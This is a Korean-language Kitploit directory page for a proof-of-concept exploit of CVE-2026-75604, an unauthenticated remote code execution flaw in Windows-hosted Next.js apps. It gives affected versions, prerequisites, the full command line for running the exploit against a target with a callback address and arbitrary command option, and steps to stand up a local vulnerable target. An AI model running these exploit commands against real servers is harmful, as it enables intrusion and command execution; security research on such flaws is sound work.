Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-75604-poc — CVE-2026-75604에 대한 개념 증명 익스플로잇으로, Windows에서 호스팅되는 Next.js 앱의 인증되지 않은 원격 코드 실행 취약점이며, 콜백 기반 명령 실행 및 로컬 대상 설정을 포함합니다. | Kitploit
도구/GitHubGitHub/rafabd1/cve-2026-75604-poc
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRemote Access Trojan
GitHubrafabd1/cve-2026-75604-poc

CVE-2026-75604-poc

CVE-2026-75604에 대한 개념 증명 익스플로잇으로, Windows에서 호스팅되는 Next.js 앱의 인증되지 않은 원격 코드 실행 취약점이며, 콜백 기반 명령 실행 및 로컬 대상 설정을 포함합니다.

저장소 보기
341일 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-75604 RCE PoC

CVE-2026-75604에 대한 Python 개념 증명(PoC)으로, Windows 호스트 Next.js 애플리케이션에서 Cache Components 없이 Pages Router와 App Router를 모두 사용하는 경우 발생하는 인증되지 않은 원격 명령 실행 취약점입니다.

데모

CVE-2026-75604 RCE 개념 증명

요구 사항

  • Next.js >=13.4 <15.5.24 또는 >=16.0 <16.3.3
  • 네이티브 Windows 서버
  • Cache Components가 없는 Pages Router 및 App Router
  • 동적 Pages ISR 라우트와 동적 캐시 App 라우트가 있는 기본 파일시스템 캐시
  • 호환되는 클로저 바인딩 Server Action
  • Python 3.9+ 및 대상에서 접근 가능한 콜백 주소

[email protected]로 검증되었습니다.

root@kitploit:~
python -m pip install -r requirements.txt

사용법

root@kitploit:~
python poc.py --target http://TARGET:3000 --callback-ip CALLBACK_IP --pages-cache-path /PATH/TO/PAGES_ISR_INSTANCE --app-cache-path /PATH/TO/APP_CACHE_INSTANCE

Server Action 경로는 기본적으로 /입니다. 폼에 필드가 두 개 이상인 경우 --action-field를 사용하세요.

필수 인자:

  • --target URL: Next.js 애플리케이션의 기본 URL
  • --callback-ip ADDRESS: 대상에서 접근 가능한 IPv4 주소
  • --pages-cache-path PATH: 기존 동적 Pages Router ISR 페이지
  • --app-cache-path PATH: 파일시스템 캐시로 백업된 기존 동적 App Router 페이지

선택 인자:

  • --command COMMAND: 실행할 명령어; 기본값은 whoami
  • --action-path PATH: 호환되는 Server Action이 포함된 App Router 페이지; 기본값은 /
  • --action-field NAME: 액션이 사용하는 폼 필드; 모호하지 않은 경우 자동 감지
  • --callback-port PORT: 콜백 포트; 기본값은 4331
  • --listen-address ADDRESS: 로컬 콜백 바인드 주소; 기본값은 0.0.0.0
  • --timeout SECONDS: 요청 및 콜백 타임아웃; 기본값은 20
  • --insecure: TLS 인증서 검증 비활성화

로컬 대상

선택 사항인 target/ 애플리케이션은 [email protected]을 고정하고 표준 Next.js 프로덕션 서버를 사용합니다:

root@kitploit:~
cd target
npm ci
npm run build
npm start

다른 터미널에서 PoC를 실행하세요:

root@kitploit:~
python poc.py --target http://127.0.0.1:4330 --callback-ip 127.0.0.1 --pages-cache-path /pages-cache/seed --app-cache-path /app-cache/seed

선택 사항인 대상은 /에 필요한 라우트와 호환되는 Server Action을 제공합니다.

면책 조항

이 PoC는 교육 목적, 보안 연구 및 승인된 테스트 전용으로 제공됩니다. 소유한 시스템 또는 명시적 테스트 권한이 있는 시스템에서만 사용하세요.

크레딧

evolutionstorm에게 크레딧을 제공합니다.

이 PoC는 공개 권고 및 Next.js 패치에서 독립적으로 재구성되었습니다.

도구 다운로드